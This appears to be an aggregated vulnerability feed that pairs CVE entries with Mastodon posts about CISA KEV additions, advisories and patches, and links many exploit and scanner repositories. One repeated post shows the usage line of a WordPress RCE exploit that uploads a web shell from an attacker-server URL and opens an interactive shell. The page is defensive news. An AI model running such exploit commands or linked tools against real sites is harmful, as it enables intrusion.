The vulnerability in question is CVE-2024-37079 (CVSS score: 9.8), which refers to a heap overflow in the implementation of the DCE/RPC protocol that could allow a bad actor with network access to vCenter Server to achieve remote code execution. thehackernews.com/2026/01/cisa

##

youranonnewsirc@nerdculture.de at 2026-01-23T21:24:23.000Z ##

Here's a summary of the latest in technology and cybersecurity from the last 24 hours:

**Cybersecurity:** Marlink Cyber revealed a critical DNS DoS flaw in ISC BIND (Jan 22). CISA added a Broadcom VMware vCenter vulnerability (CVE-2024-37079) to its exploited list (Jan 23). CISA & NSA warned of Chinese state-sponsored BRICKSTORM malware targeting gov networks (Jan 22).

**Technology:** Apple's Siri AI training is reportedly shifting to Google's TPUs (Jan 22). Nvidia CEO Jensen Huang linked AI growth to power constraints at Davos (Jan 22).

#News #Anonymous #AnonNews_irc

##

DarkWebInformer@infosec.exchange at 2026-01-23T19:52:04.000Z ##

‼️CISA has added 5 vulnerabilities to the KEV Catalog

darkwebinformer.com/cisa-kev-c

CVE-2024-37079: Broadcom VMware vCenter Server Out-of-bounds Write Vulnerability

CVE-2025-68645: Synacor Zimbra Collaboration Suite (ZCS) PHP Remote File Inclusion Vulnerability

CVE-2025-34026: Versa Concerto Improper Authentication Vulnerability

CVE-2025-31125: Vite Vitejs Improper Access Control Vulnerability

CVE-2025-54313: Prettier eslint-config-prettier Embedded Malicious Code Vulnerability

##

cisakevtracker@mastodon.social at 2026-01-23T19:01:12.000Z ##

CVE ID: CVE-2024-37079
Vendor: Broadcom
Product: VMware vCenter Server
Date Added: 2026-01-23
Notes: support.broadcom.com/web/ecx/s ; nvd.nist.gov/vuln/detail/CVE-2
CVE URL: nvd.nist.gov/vuln/detail/CVE-2

##

CVE-2025-70983
(10.0 CRITICAL)

EPSS: 0.01%

updated 2026-01-23T21:30:54

1 posts

Incorrect access control in the authRoutes function of SpringBlade v4.5.0 allows attackers with low-level privileges to escalate privileges.

thehackerwire@mastodon.social at 2026-01-23T20:24:29.000Z ##

πŸ”΄ CVE-2025-70983 - Critical (9.9)

Incorrect access control in the authRoutes function of SpringBlade v4.5.0 allows attackers with low-level privileges to escalate privileges.

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-70985
(9.1 CRITICAL)

EPSS: 0.01%

updated 2026-01-23T21:30:44

1 posts

Incorrect access control in the update function of RuoYi v4.8.2 allows unauthorized attackers to arbitrarily modify data outside of their scope.

thehackerwire@mastodon.social at 2026-01-23T20:24:39.000Z ##

πŸ”΄ CVE-2025-70985 - Critical (9.1)

Incorrect access control in the update function of RuoYi v4.8.2 allows unauthorized attackers to arbitrarily modify data outside of their scope.

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-56590
(9.8 CRITICAL)

EPSS: 0.05%

updated 2026-01-23T21:30:43

1 posts

An issue was discovered in the InsertFromURL() function of the Apryse HTML2PDF SDK thru 11.10. This vulnerability could allow an attacker to execute arbitrary operating system commands on the local server.

thehackerwire@mastodon.social at 2026-01-24T07:45:39.000Z ##

πŸ”΄ CVE-2025-56590 - Critical (9.8)

An issue was discovered in the InsertFromURL() function of the Apryse HTML2PDF SDK thru 11.10. This vulnerability could allow an attacker to execute arbitrary operating system commands on the local server.

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-24572
(8.8 HIGH)

EPSS: 0.01%

updated 2026-01-23T21:30:43

1 posts

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Nelio Software Nelio Content nelio-content allows Blind SQL Injection.This issue affects Nelio Content: from n/a through <= 4.1.0.

thehackerwire@mastodon.social at 2026-01-24T00:15:47.000Z ##

🟠 CVE-2026-24572 - High (8.8)

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Nelio Software Nelio Content nelio-content allows Blind SQL Injection.This issue affects Nelio Content: from n/a through &lt;= 4.1.0.

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-34026
(7.5 HIGH)

EPSS: 47.46%

updated 2026-01-23T21:30:35

1 posts

The Versa Concerto SD-WAN orchestration platform is vulnerable to an authentication bypass in the Traefik reverse proxy configuration, allowing at attacker to access administrative endpoints. The internal Actuator endpoint can be leveraged for access to heap dumps and trace logs.This issue is known to affect Concerto from 12.1.2 through 12.2.0. Additional versions may be vulnerable.

Nuclei template

DarkWebInformer@infosec.exchange at 2026-01-23T19:52:04.000Z ##

‼️CISA has added 5 vulnerabilities to the KEV Catalog

darkwebinformer.com/cisa-kev-c

CVE-2024-37079: Broadcom VMware vCenter Server Out-of-bounds Write Vulnerability

CVE-2025-68645: Synacor Zimbra Collaboration Suite (ZCS) PHP Remote File Inclusion Vulnerability

CVE-2025-34026: Versa Concerto Improper Authentication Vulnerability

CVE-2025-31125: Vite Vitejs Improper Access Control Vulnerability

CVE-2025-54313: Prettier eslint-config-prettier Embedded Malicious Code Vulnerability

##

CVE-2026-20912(CVSS UNKNOWN)

EPSS: 0.03%

updated 2026-01-23T20:14:54

1 posts

Gitea does not properly validate repository ownership when linking attachments to releases. An attachment uploaded to a private repository could potentially be linked to a release in a different public repository, making it accessible to unauthorized users.

thehackerwire@mastodon.social at 2026-01-24T00:17:39.000Z ##

πŸ”΄ CVE-2026-20912 - Critical (9.1)

Gitea does not properly validate repository ownership when linking attachments to releases. An attachment uploaded to a private repository could potentially be linked to a release in a different public repository, making it accessible to unauthori...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-20750(CVSS UNKNOWN)

EPSS: 0.03%

updated 2026-01-23T20:14:36

1 posts

Gitea does not properly validate project ownership in organization project operations. A user with project write access in one organization may be able to modify projects belonging to a different organization.

thehackerwire@mastodon.social at 2026-01-24T07:45:19.000Z ##

πŸ”΄ CVE-2026-20750 - Critical (9.1)

Gitea does not properly validate project ownership in organization project operations. A user with project write access in one organization may be able to modify projects belonging to a different organization.

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-11344
(6.3 MEDIUM)

EPSS: 0.19%

updated 2026-01-23T19:15:51.993000

1 posts

A vulnerability was detected in ILIAS up to 8.23/9.13/10.1. Affected by this vulnerability is an unknown functionality of the component Certificate Import Handler. The manipulation results in Remote Code Execution. The attack may be performed from remote. Upgrading to version 8.24, 9.14 and 10.2 addresses this issue. It is recommended to upgrade the affected component.

renereh1@neos.social at 2026-01-24T12:33:22.000Z ##

ILIAS 10.0, 10.1, 10.2 – Unauthenticated RCE write-up published:
srlabs.de/blog/breaking-ilias-

Why is this being published only now?

The vulnerability discussed here is tracked as CVE-2025-11344 and was assigned a CVSS base score of 5.3 (MEDIUM). Anyone wondering why this was not classified as CRITICAL should be aware that the CNA relied on the base score and severity assessment provided by ILIAS in its security advisory, which included neither a scoring matrix nor any justification for the rating.

##

CVE-2025-68645
(8.8 HIGH)

EPSS: 26.23%

updated 2026-01-23T18:39:33.290000

1 posts

A Local File Inclusion (LFI) vulnerability exists in the Webmail Classic UI of Zimbra Collaboration (ZCS) 10.0 and 10.1 because of improper handling of user-supplied request parameters in the RestFilter servlet. An unauthenticated remote attacker can craft requests to the /h/rest endpoint to influence internal request dispatching, allowing inclusion of arbitrary files from the WebRoot directory.

Nuclei template

3 repos

https://github.com/Ashwesker/Ashwesker-CVE-2025-68645

https://github.com/MaxMnMl/zimbramail-CVE-2025-68645-poc

https://github.com/chinaxploiter/CVE-2025-68645-PoC

DarkWebInformer@infosec.exchange at 2026-01-23T19:52:04.000Z ##

‼️CISA has added 5 vulnerabilities to the KEV Catalog

darkwebinformer.com/cisa-kev-c

CVE-2024-37079: Broadcom VMware vCenter Server Out-of-bounds Write Vulnerability

CVE-2025-68645: Synacor Zimbra Collaboration Suite (ZCS) PHP Remote File Inclusion Vulnerability

CVE-2025-34026: Versa Concerto Improper Authentication Vulnerability

CVE-2025-31125: Vite Vitejs Improper Access Control Vulnerability

CVE-2025-54313: Prettier eslint-config-prettier Embedded Malicious Code Vulnerability

##

CVE-2026-24423(CVSS UNKNOWN)

EPSS: 0.09%

updated 2026-01-23T18:31:37

2 posts

SmarterTools SmarterMail versions prior to build 9511 contain an unauthenticated remote code execution vulnerability in the ConnectToHub API method. The attacker could point the SmarterMail to the malicious HTTP server, which serves the malicious OS command. This command will be executed by the vulnerable application.

AAKL at 2026-01-27T15:59:15.064Z ##

SmarterTools aren't so smart after all.

VulnCheck, from yesterday: Street Smarts: SmarterMail ConnectToHub Unauthenticated RCE (CVE-2026-24423) vulncheck.com/blog/smartermail @vulncheck

##

AAKL@infosec.exchange at 2026-01-27T15:59:15.000Z ##

SmarterTools aren't so smart after all.

VulnCheck, from yesterday: Street Smarts: SmarterMail ConnectToHub Unauthenticated RCE (CVE-2026-24423) vulncheck.com/blog/smartermail @vulncheck #infosec #threatresearch #vulnerability

##

CVE-2024-9932
(9.8 CRITICAL)

EPSS: 81.47%

updated 2026-01-23T18:31:22

2 posts

The Wux Blog Editor plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file type validation in the 'wuxbt_insertImageNew' function in versions up to, and including, 3.0.0. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.

3 repos

https://github.com/RandomRobbieBF/CVE-2024-9932

https://github.com/Nxploited/CVE-2024-9932-POC

https://github.com/JoshuaProvoste/0-click-RCE-Exploit-for-CVE-2024-9932

DarkWebInformer at 2026-01-27T20:03:17.299Z ##

‼️ CVE-2024-9932: An unauthenticated arbitrary file upload vulnerability in the Wux Blog Editor WordPress plugin, leading to remote command execution (RCE).

GitHub: github.com/JoshuaProvoste/0-cl

Type: 0-Click RCE Exploit

Usage: python CVE-2024-9932.py --target http://target-wordpress-site --payload http://attacker-server/cmd.php --payload_name cmd.php

After execution, the script uploads the payload, confirms its accessibility, detects the OS, and drops into an interactive shell.

##

DarkWebInformer@infosec.exchange at 2026-01-27T20:03:17.000Z ##

‼️ CVE-2024-9932: An unauthenticated arbitrary file upload vulnerability in the Wux Blog Editor WordPress plugin, leading to remote command execution (RCE).

GitHub: github.com/JoshuaProvoste/0-cl

Type: 0-Click RCE Exploit

Usage: python CVE-2024-9932.py --target http://target-wordpress-site --payload http://attacker-server/cmd.php --payload_name cmd.php

After execution, the script uploads the payload, confirms its accessibility, detects the OS, and drops into an interactive shell.

##

CVE-2025-4319
(9.4 CRITICAL)

EPSS: 0.07%

updated 2026-01-23T15:31:44

1 posts

Improper Restriction of Excessive Authentication Attempts, Weak Password Recovery Mechanism for Forgotten Password vulnerability in Birebirsoft Software and Technology Solutions Sufirmam allows Brute Force, Password Recovery Exploitation.This issue affects Sufirmam: through 23012026.Β NOTE: The vendor was contacted early about this disclosure but did not respond in any way.

thehackerwire@mastodon.social at 2026-01-23T13:43:50.000Z ##

πŸ”΄ CVE-2025-4319 - Critical (9.4)

Improper Restriction of Excessive Authentication Attempts, Weak Password Recovery Mechanism for Forgotten Password vulnerability in Birebirsoft Software and Technology Solutions Sufirmam allows Brute Force, Password Recovery Exploitation.This issu...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-15351
(7.8 HIGH)

EPSS: 0.21%

updated 2026-01-23T06:31:32

1 posts

Anritsu VectorStar CHX File Parsing Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Anritsu VectorStar. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsin

thehackerwire@mastodon.social at 2026-01-23T14:00:02.000Z ##

🟠 CVE-2025-15351 - High (7.8)

Anritsu VectorStar CHX File Parsing Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Anritsu VectorStar. User interaction is re...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-15349
(7.5 HIGH)

EPSS: 0.09%

updated 2026-01-23T06:31:32

1 posts

Anritsu ShockLine SCPI Race Condition Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of Anritsu ShockLine. Authentication is not required to exploit this vulnerability. The specific flaw exists within the SCPI component. The issue results from the lack of proper locking when performing operations on an

thehackerwire@mastodon.social at 2026-01-23T13:59:41.000Z ##

🟠 CVE-2025-15349 - High (7.5)

Anritsu ShockLine SCPI Race Condition Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of Anritsu ShockLine. Authentication is not required to exploit thi...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-15059
(7.8 HIGH)

EPSS: 0.06%

updated 2026-01-23T06:31:26

1 posts

GIMP PSP File Parsing Heap-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GIMP. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of PSP files. The issue results f

thehackerwire@mastodon.social at 2026-01-23T14:20:17.000Z ##

🟠 CVE-2025-15059 - High (7.8)

GIMP PSP File Parsing Heap-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GIMP. User interaction is required to exploit this vulnerabilit...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-15061
(9.8 CRITICAL)

EPSS: 0.85%

updated 2026-01-23T06:31:24

1 posts

Framelink Figma MCP Server fetchWithRetry Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Framelink Figma MCP Server. Authentication is not required to exploit this vulnerability. The specific flaw exists within the implementation of the fetchWithRetry method. The issue results from the lack o

thehackerwire@mastodon.social at 2026-01-23T14:20:28.000Z ##

πŸ”΄ CVE-2025-15061 - Critical (9.8)

Framelink Figma MCP Server fetchWithRetry Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Framelink Figma MCP Server. Authentication is not re...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-15350
(7.8 HIGH)

EPSS: 0.21%

updated 2026-01-23T06:31:24

1 posts

Anritsu VectorStar CHX File Parsing Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Anritsu VectorStar. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsin

thehackerwire@mastodon.social at 2026-01-23T13:59:52.000Z ##

🟠 CVE-2025-15350 - High (7.8)

Anritsu VectorStar CHX File Parsing Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Anritsu VectorStar. User interaction is re...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-15348
(7.8 HIGH)

EPSS: 0.21%

updated 2026-01-23T06:31:23

1 posts

Anritsu ShockLine CHX File Parsing Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Anritsu ShockLine. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing

thehackerwire@mastodon.social at 2026-01-23T13:12:29.000Z ##

🟠 CVE-2025-15348 - High (7.8)

Anritsu ShockLine CHX File Parsing Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Anritsu ShockLine. User interaction is requ...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-1201(CVSS UNKNOWN)

EPSS: 0.04%

updated 2026-01-23T00:31:24

1 posts

An Authorization Bypass Through User-Controlled Key vulnerability in Hubitat Elevation home automation controllers prior to version 2.4.2.157 could allow a remote authenticated user to control connected devices outside of their authorized scope via client-side request manipulation.

beyondmachines1@infosec.exchange at 2026-01-24T15:01:02.000Z ##

Hubitat Patches Critical Authorization Bypass in Elevation Hubs

Hubitat patched a critical authorization bypass vulnerability (CVE-2026-1201) in its Elevation Hubs that allowed authenticated users to gain unauthorized control over connected devices.

**Make sure all Hubitat devices are isolated from the internet and accessible from trusted networks only. Also, limit the access only to trusted users and educate them on risks of malware, infostealers, password recycling and phishing. Then plan an update cycle for your Hubitat Elevation Hub to firmware version 2.4.2.157.**
#cybersecurity #infosec #advisory #vulnerability
beyondmachines.net/event_detai

##

CVE-2026-24305
(9.3 CRITICAL)

EPSS: 0.07%

updated 2026-01-23T00:31:24

1 posts

Azure Entra ID Elevation of Privilege Vulnerability

AAKL@infosec.exchange at 2026-01-23T17:12:39.000Z ##

If you missed this, Microsoft posted several security updates yesterday, all of them critical, affecting Microsoft accounts, Copilot, Office, Azure, and Entra: msrc.microsoft.com/update-guide

Noteworthy:

- Microsoft Account Spoofing Vulnerability: CVE-2026-21264 msrc.microsoft.com/update-guid

- Azure Entra ID Elevation of Privilege Vulnerability: CVE-2026-24305 msrc.microsoft.com/update-guid

- Azure Front Door Elevation of Privilege Vulnerability: CVE-2026-24306 msrc.microsoft.com/update-guid #infosec #Microsoft #Azure #Copilot #vulnerability

##

CVE-2026-24306
(9.8 CRITICAL)

EPSS: 0.09%

updated 2026-01-23T00:31:24

1 posts

Improper access control in Azure Front Door (AFD) allows an unauthorized attacker to elevate privileges over a network.

1 repos

https://github.com/b1gchoi/CVE-2026-24306

AAKL@infosec.exchange at 2026-01-23T17:12:39.000Z ##

If you missed this, Microsoft posted several security updates yesterday, all of them critical, affecting Microsoft accounts, Copilot, Office, Azure, and Entra: msrc.microsoft.com/update-guide

Noteworthy:

- Microsoft Account Spoofing Vulnerability: CVE-2026-21264 msrc.microsoft.com/update-guid

- Azure Entra ID Elevation of Privilege Vulnerability: CVE-2026-24305 msrc.microsoft.com/update-guid

- Azure Front Door Elevation of Privilege Vulnerability: CVE-2026-24306 msrc.microsoft.com/update-guid #infosec #Microsoft #Azure #Copilot #vulnerability

##

CVE-2025-54816
(9.4 CRITICAL)

EPSS: 0.07%

updated 2026-01-23T00:31:17

1 posts

This vulnerability occurs when a WebSocket endpoint does not enforce proper authentication mechanisms, allowing unauthorized users to establish connections. As a result, attackers can exploit this weakness to gain unauthorized access to sensitive data or perform unauthorized actions. Given that no authentication is required, this can lead to privilege escalation and potentially compromise the

beyondmachines1@infosec.exchange at 2026-01-23T13:01:02.000Z ##

Multiple Vulnerabilities Reported in EVMAPA Electric Vehicle Charging Systems

CISA reports three vulnerabilities in EVMAPA charging station management software, including a critical authentication bypass (CVE-2025-54816) that allows remote command execution and service disruption.

**Make sure all EVAMPA managed systems are isolated from the internet and accessible from trusted networks only. Two of the three laws don't have a patch yet, so your priority control is isolation. Then reach to the vendor for more details on upcoming patches.**
#cybersecurity #infosec #advisory #vulnerability
beyondmachines.net/event_detai

##

CVE-2026-20613(CVSS UNKNOWN)

EPSS: 0.01%

updated 2026-01-22T22:30:06

1 posts

### Summary The `ArchiveReader.extractContents()` function used by `cctl image load` and container image load performs no pathname validation before extracting an archive member. This means that a carelessly or maliciously constructed archive can extract a file into any user-writable location on the system using relative pathnames. ### Details The code in question is: https://github.com/apple/co

thehackerwire@mastodon.social at 2026-01-23T15:53:05.000Z ##

🟠 CVE-2026-20613 - High (7.8)

The ArchiveReader.extractContents() function used by cctl image load and container image load performs no pathname validation before extracting an archive member. This means that a carelessly or maliciously constructed archive can extract a file i...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-54313
(7.5 HIGH)

EPSS: 4.17%

updated 2026-01-22T21:52:57

1 posts

eslint-config-prettier 8.10.1, 9.1.1, 10.1.6, and 10.1.7 has embedded malicious code for a supply chain compromise. Installing an affected package executes an install.js file that launches the node-gyp.dll malware on Windows.

3 repos

https://github.com/ShinP451/scavenger_scanner

https://github.com/Drasrax/npm-shai-hulud-scanner

https://github.com/nihilor/cve-2025-54313

DarkWebInformer@infosec.exchange at 2026-01-23T19:52:04.000Z ##

‼️CISA has added 5 vulnerabilities to the KEV Catalog

darkwebinformer.com/cisa-kev-c

CVE-2024-37079: Broadcom VMware vCenter Server Out-of-bounds Write Vulnerability

CVE-2025-68645: Synacor Zimbra Collaboration Suite (ZCS) PHP Remote File Inclusion Vulnerability

CVE-2025-34026: Versa Concerto Improper Authentication Vulnerability

CVE-2025-31125: Vite Vitejs Improper Access Control Vulnerability

CVE-2025-54313: Prettier eslint-config-prettier Embedded Malicious Code Vulnerability

##

CVE-2025-31125
(5.3 MEDIUM)

EPSS: 65.97%

updated 2026-01-22T21:47:41

1 posts

### Summary The contents of arbitrary files can be returned to the browser. ### Impact Only apps explicitly exposing the Vite dev server to the network (using `--host` or [`server.host` config option](https://vitejs.dev/config/server-options.html#server-host)) are affected. ### Details - base64 encoded content of non-allowed files is exposed using `?inline&import` (originally reported as `?imp

Nuclei template

7 repos

https://github.com/nkuty/CVE-2025-30208-31125-31486-32395

https://github.com/xuemian168/CVE-2025-30208

https://github.com/sunhuiHi666/CVE-2025-31125

https://github.com/0xgh057r3c0n/CVE-2025-31125

https://github.com/MuhammadWaseem29/Vitejs-exploit

https://github.com/harshgupptaa/Path-Transversal-CVE-2025-31125-

https://github.com/jackieya/ViteVulScan

DarkWebInformer@infosec.exchange at 2026-01-23T19:52:04.000Z ##

‼️CISA has added 5 vulnerabilities to the KEV Catalog

darkwebinformer.com/cisa-kev-c

CVE-2024-37079: Broadcom VMware vCenter Server Out-of-bounds Write Vulnerability

CVE-2025-68645: Synacor Zimbra Collaboration Suite (ZCS) PHP Remote File Inclusion Vulnerability

CVE-2025-34026: Versa Concerto Improper Authentication Vulnerability

CVE-2025-31125: Vite Vitejs Improper Access Control Vulnerability

CVE-2025-54313: Prettier eslint-config-prettier Embedded Malicious Code Vulnerability

##

CVE-2026-0920
(9.8 CRITICAL)

EPSS: 0.03%

updated 2026-01-22T09:31:48

1 posts

The LA-Studio Element Kit for Elementor plugin for WordPress is vulnerable to Administrative User Creation in all versions up to, and including, 1.5.6.3. This is due to the 'ajax_register_handle' function not restricting what user roles a user can register with. This makes it possible for unauthenticated attackers to supply the 'lakit_bkrole' parameter during registration and gain administrator ac

2 repos

https://github.com/Galaxy-sc/CVE-2026-0920-WordPress-LA-Studio-Exploit

https://github.com/O99099O/By-Poloss..-..CVE-2026-0920

beyondmachines1@infosec.exchange at 2026-01-25T14:01:02.000Z ##

20,000 WordPress Sites Exposed to Backdoor in LA-Studio Element Kit

LA-Studio patched a critical backdoor in its Element Kit for Elementor plugin (CVE-2026-0920) that allowed unauthenticated attackers to create administrator accounts. The malicious code was planted by a former employee and affected over 20,000 WordPress websites.

**If you are using Element Kit for Elementor, this is URGENT. Your plugin may have an active backdoor. Update the LA-Studio Element Kit plugin to version 1.6.0 immediately to remove the backdoor and review your Wordpress server users for unexpected user accounts.**
#cybersecurity #infosec #advisory #vulnerability
beyondmachines.net/event_detai

##

CVE-2026-22755(CVSS UNKNOWN)

EPSS: 0.96%

updated 2026-01-20T21:31:34

1 posts

Improper Neutralization of Special Elements used in a Command ('Command Injection') vulnerability in Vivotek Affected device model numbers are FD8365, FD8365v2, FD9165, FD9171, FD9187, FD9189, FD9365, FD9371, FD9381, FD9387, FD9389, FD9391,FE9180,FE9181, FE9191, FE9381, FE9382, FE9391, FE9582, IB9365, IB93587LPR, IB9371,IB9381, IB9387, IB9389, IB939,IP9165,IP9171, IP9172, IP9181, IP9191, IT9389, M

beyondmachines1@infosec.exchange at 2026-01-23T12:01:03.000Z ##

Critical Command Injection Vulnerability in Legacy Vivotek Cameras

Akamai SIRT discovered a critical command injection vulnerability (CVE-2026-22755) in legacy Vivotek cameras that allows unauthenticated attackers to execute arbitrary code as root.

**If you are using Vivotek cameras, this is important and urgent. Make sure your cameras are isolated from the internet and accessible from trusted networks only. Check and enforce password authentication. Then check your firmware version and if there's an update, patch ASAP. For end-of-life devices, isolate them, enforce passwords and plan a replacement process.**
#cybersecurity #infosec #advisory #vulnerability
beyondmachines.net/event_detai

##

CVE-2026-20965
(7.6 HIGH)

EPSS: 0.03%

updated 2026-01-13T18:31:18

1 posts

Improper verification of cryptographic signature in Windows Admin Center allows an authorized attacker to elevate privileges locally.

agowa338@chaos.social at 2026-01-25T11:42:45.000Z ##

Microslop is a bit late for the new year celebration (or a bit early for Chinese new year).

Either way they're starting/ending the year with a banger: CVE-2026-20965

Being able to steal Global Admin token and labeling it a medium severity.

#infosec #infosec2026 #itsec #itsecurity

##

CVE-2025-55182
(10.0 CRITICAL)

EPSS: 57.94%

updated 2025-12-09T16:53:25

1 posts

### Impact There is an unauthenticated remote code execution vulnerability in React Server Components. We recommend upgrading immediately. The vulnerability is present in versions 19.0.0, 19.1.0, 19.1.1, and 19.2.0 of: * [react-server-dom-webpack](https://www.npmjs.com/package/react-server-dom-webpack) * [react-server-dom-parcel](https://www.npmjs.com/package/react-server-dom-parcel) * [react-s

Nuclei template

100 repos

https://github.com/ynsmroztas/NextRce

https://github.com/kOaDT/poc-cve-2025-55182

https://github.com/assetnote/react2shell-scanner

https://github.com/pyroxenites/Nextjs_RCE_Exploit_Tool

https://github.com/tobiasGuta/Next.js-RSC-RCE-Scanner-Burp-Suite-Extension

https://github.com/Chocapikk/CVE-2025-55182

https://github.com/Rsatan/Next.js-Exploit-Tool

https://github.com/Ashwesker/Ashwesker-CVE-2025-55182

https://github.com/VeilVulp/RscScan-cve-2025-55182

https://github.com/BankkRoll/Quickcheck-CVE-2025-55182-React-and-CVE-2025-66478-Next.js

https://github.com/xkillbit/cve-2025-55182-scanner

https://github.com/freeqaz/react2shell

https://github.com/sickwell/CVE-2025-55182

https://github.com/chrahman/react2shell-CVE-2025-55182-full-rce-script

https://github.com/MoLeft/React2Shell-Toolbox

https://github.com/MemerGamer/CVE-2025-55182

https://github.com/lachlan2k/React2Shell-CVE-2025-55182-original-poc

https://github.com/keklick1337/CVE-2025-55182-golang-PoC

https://github.com/zack0x01/CVE-2025-55182-advanced-scanner-

https://github.com/LemonTeatw1/CVE-2025-55182-exploit

https://github.com/msanft/CVE-2025-55182

https://github.com/Spritualkb/CVE-2025-55182-exp

https://github.com/ejpir/CVE-2025-55182-bypass

https://github.com/aliclub0x00/CVE-2025-55182-POC-NEXTJS

https://github.com/emredavut/CVE-2025-55182

https://github.com/yz9yt/React2Shell-CTF

https://github.com/CymulateResearch/React2Shell-Scanner

https://github.com/yanoshercohen/React2Shell_CVE-2025-55182

https://github.com/Pizz33/CVE-2025-55182-burpscanner

https://github.com/ThemeHackers/CVE-2025-55182

https://github.com/momika233/CVE-2025-55182-bypass

https://github.com/StealthMoud/CVE-2025-55182-Scanner

https://github.com/songsanggggg/CVE-2025-55182

https://github.com/fBUZk2BH/RSC-Detect-CVE-2025-55182

https://github.com/nehkark/CVE-2025-55182

https://github.com/hoosin/CVE-2025-55182

https://github.com/kondukto-io/vulnerable-next-js-poc

https://github.com/fullhunt/react2shell-test-server

https://github.com/CirqueiraDev/MassExploit-CVE-2025-55182

https://github.com/zack0x01/vuln-app-CVE-2025-55182

https://github.com/Faithtiannn/CVE-2025-55182

https://github.com/BlackTechX011/React2Shell

https://github.com/c0rydoras/CVE-2025-55182

https://github.com/pax-k/react2shell-CVE-2025-55182-full-rce-script

https://github.com/ZihxS/check-react-rce-cve-2025-55182

https://github.com/gensecaihq/react2shell-scanner

https://github.com/Security-Phoenix-demo/react2shell-scanner-rce-react-next-CVE-2025-55182-CVE-2025-66478

https://github.com/heiheishushu/rsc_detect_CVE-2025-55182

https://github.com/mrknow001/RSC_Detector

https://github.com/techgaun/cve-2025-55182-scanner

https://github.com/fatguru/CVE-2025-55182-scanner

https://github.com/Saturate/CVE-2025-55182-Scanner

https://github.com/Cillian-Collins/CVE-2025-55182

https://github.com/M4xSec/CVE-2025-55182-React2Shell-RCE-Shell

https://github.com/vijay-shirhatti/RSC-Detect-CVE-2025-55182

https://github.com/whiteov3rflow/CVE-2025-55182-poc

https://github.com/Updatelap/CVE-2025-55182

https://github.com/logesh-GIT001/CVE-2025-55182

https://github.com/theori-io/reactguard

https://github.com/subhdotsol/CVE-2025-55182

https://github.com/websecuritylabs/React2Shell-Library

https://github.com/xcanwin/CVE-2025-55182-React-RCE

https://github.com/hackersatyamrastogi/react2shell-ultimate

https://github.com/sumanrox/rschunter

https://github.com/jf0x3a/CVE-2025-55182-exploit

https://github.com/Tiger-Foxx/exploit-react-CVE-2025-55182

https://github.com/AliHzSec/CVE-2025-55182

https://github.com/zzhorc/CVE-2025-55182

https://github.com/timsonner/React2Shell-CVE-2025-55182

https://github.com/RuoJi6/CVE-2025-55182-RCE-shell

https://github.com/EynaExp/CVE-2025-55182-POC

https://github.com/kavienanj/CVE-2025-55182

https://github.com/acheong08/CVE-2025-55182-poc

https://github.com/surajhacx/react2shellpoc

https://github.com/dwisiswant0/CVE-2025-55182

https://github.com/mbanyamer/React2Shell

https://github.com/im-ezboy/CVE-2025-55182-zoomeye

https://github.com/TrixSec/CVE-2025-55182-Scanner

https://github.com/cybertechajju/R2C-CVE-2025-55182-66478

https://github.com/l4rm4nd/CVE-2025-55182

https://github.com/alsaut1/react2shell-lab

